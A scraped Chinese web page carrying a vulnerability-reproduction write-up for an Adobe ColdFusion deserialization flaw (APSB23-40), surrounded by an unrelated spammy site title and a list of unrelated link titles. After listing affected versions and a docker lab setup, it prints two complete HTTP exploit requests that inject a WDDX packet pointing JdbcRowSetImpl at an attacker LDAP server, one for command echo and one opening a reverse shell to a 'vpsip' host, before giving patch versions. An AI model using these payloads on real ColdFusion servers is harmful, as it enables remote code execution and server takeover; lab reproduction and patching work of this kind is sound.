当前位置: 首页 > news >正文

百度爱采购网站官网网络下载的网站模板能直接上传到虚拟主机

news 2025/9/18 1:11:10
百度爱采购网站官网,网络下载的网站模板能直接上传到虚拟主机,福建住房和城乡建设厅网站,山东工商网上服务大厅0x01 产品简介 Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 0x02 漏洞概述 Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击…

0x01 产品简介

      Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

     Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。

0x03 影响范围

    ColdFusion 2018 <= Update 16 

    ColdFusion 2021 <= Update 6 

    ColdFusion 2023 GA Release (2023.0.0.330468)

0x04 复现环境

 docker搭建ColdFusion 2023.0.0.330468漏洞环境

拉取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动环境

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

 PS:需确认8080对应的端口

验证是否可访问环境

0x05 漏洞复现

exp

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: idargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://your-ip:1389/Basic/TomcatEcho</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

PS:本次复现需要使用jndi漏洞利用工具(JNDIExploit-1.4-SNAPSHOT.jar)

TomcatEcho回显链

 开启监听

反弹shell

利用链:

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencodedargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

 

 0x06 修复建议

根据影响版本中的信息,建议相关用户尽快更新至安全版本:

ColdFusion 2018 Update 17

ColdFusion 2021 Update 7

ColdFusion 2023 Update 1

下载链接请参考:

https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

http://www.yayakq.cn/news/29491/

相关文章:

  • dwcc2018怎么做网站上传网站模板建站
  • 科技公司 网站设计经典案例wordpress登陆界面修改
  • 岳池县网站建设html网页制作免费模板下载
  • 餐饮网站建设网站正规推广平台
  • 网站建设分工表项目建设的背景怎么写
  • 网站开发维护工作如何做网站网站代理
  • 班级网站建设规划书wordpress表格制作
  • 做网站时间公司网站的开发策略
  • 湛江h5建站制作页培训
  • 网站设计深圳联系电话?莱芜在线和莱芜都市网
  • 学习网站建设网站从零开始wordpress主题
  • 广州做网站 timhi做内衣的网站好
  • 坑梓做网站wordpress调用自定义分类标题
  • 石景山网站建设推广阜南做网站公司
  • 电商网站建设最好的公司企业网站设计制作
  • 深圳网站设计有限公司wordpress 关于页面
  • 上海海宏建设集团网站上海网站制作推广
  • 网站建设理论知识静态网站后台管理系统
  • 做网站要找什么人杭州网站建设公司推荐
  • 域名 就一个网站企业网站网站建设
  • 深圳 网站建设 销售黄骅贴吧最新消息金鼎18号
  • 阿里云虚拟主机做多个网站wordpress 如何编辑器
  • 网站平台搭建和维护需要什么企业网站源码php
  • 网站备案名称的影响吗网站流量如何赚钱
  • 建站公司 网络服务公司企业做网站怎么做
  • 电商网站代码设计多用户服务交易系统
  • 3322做网站公司怎么做网站页面
  • 做餐饮系统网站建设哪家公司网站建设好
  • 有注入漏洞的网站源码泰安手机网站
  • 网站制作价格公司东莞公司网站建设营销型网站建设